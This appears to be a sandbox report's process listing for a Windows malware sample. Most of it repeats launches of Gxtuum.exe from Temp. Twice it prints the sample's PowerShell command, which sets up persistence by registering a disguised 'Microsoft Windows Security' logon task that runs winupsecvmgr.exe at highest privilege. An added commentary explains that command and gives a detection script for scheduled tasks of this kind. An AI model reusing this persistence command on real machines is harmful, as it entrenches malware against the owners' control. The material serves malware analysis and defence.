"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
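The PowerShell command line above (it appears twice in this listing) registers a logon task named "Microsoft Windows Security" that runs `winupsecvmgr.exe` from the user's profile with the highest available run level. The version branch is there because `Register-ScheduledTask` and the ScheduledTasks module only exist from Windows 8 / Server 2012 (NT 6.2) onward; older systems get the equivalent `schtasks /create` call. The settings it chooses (start on battery, never stop on battery or idle end, no hard terminate, a 1000-day execution limit) are all aimed at keeping the payload resident. The script below is an added example, not part of the report, that audits a host's scheduled tasks for the same combination of traits and scores each task; the threshold of three flags and the 30-day time-limit cutoff are assumptions chosen for illustration.

```powershell
# Added example, not part of the sandbox report: score scheduled tasks on the traits
# of the persistence task registered by the command above. Needs an elevated session
# on Windows 8 / Server 2012 or later (ScheduledTasks module). Thresholds are assumptions.

function Get-SuspiciousLogonTask {
    param([int]$MinimumScore = 3)

    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions carry no Execute

            $exe   = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            $flags = New-Object System.Collections.Generic.List[string]

            if ($exe -match '^[A-Za-z]:\\Users\\') { $flags.Add('exe-under-user-profile') }
            if ($task.Principal.RunLevel -eq 'Highest') { $flags.Add('runlevel-highest') }
            if ($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }) {
                $flags.Add('logon-trigger')
            }
            # Microsoft's own tasks live under \Microsoft\...; a vendor-sounding name in the root folder is odd.
            if ($task.TaskPath -eq '\' -and $task.TaskName -match 'Microsoft|Windows|Security') {
                $flags.Add('vendor-lookalike-name-in-root')
            }
            # ExecutionTimeLimit is an ISO 8601 duration: "PT72H" is the default, "PT0S" means unlimited,
            # New-TimeSpan -Days 1000 is stored as "P1000D".
            $limit = $task.Settings.ExecutionTimeLimit
            if ($limit) {
                try {
                    $span = [System.Xml.XmlConvert]::ToTimeSpan($limit)
                    if ($span -eq [TimeSpan]::Zero -or $span.TotalDays -gt 30) { $flags.Add("time-limit-$limit") }
                } catch { }
            }
            if ($task.Settings.DisallowStartIfOnBatteries -eq $false -and
                $task.Settings.StopIfGoingOnBatteries -eq $false -and
                $task.Settings.AllowHardTerminate -eq $false) {
                $flags.Add('keep-alive-settings')
            }
            if ((Test-Path -LiteralPath $exe) -and
                (Get-AuthenticodeSignature -FilePath $exe).Status -ne 'Valid') {
                $flags.Add('target-not-validly-signed')
            }

            if ($flags.Count -ge $MinimumScore) {
                [pscustomobject]@{
                    TaskPath = $task.TaskPath
                    TaskName = $task.TaskName
                    Execute  = $exe
                    Author   = $task.Author
                    Score    = $flags.Count
                    Flags    = ($flags -join ',')
                }
            }
        }
    }
}

Get-SuspiciousLogonTask | Sort-Object Score -Descending | Format-Table -AutoSize
```

A task registered by the command above scores on every flag except possibly the signature check, so it surfaces at the top; legitimate software that installs a logon task from `C:\Users` with a normal time limit and default power settings usually stays under the threshold. Pair the host check with the task file under `C:\Windows\System32\Tasks\<name>` and the `schtasks /run /tn "Microsoft Windows Security"` launch seen later in this listing, which is the sample starting its own task immediately instead of waiting for the next logon.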
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe"
C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe
C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe"
C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe
C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
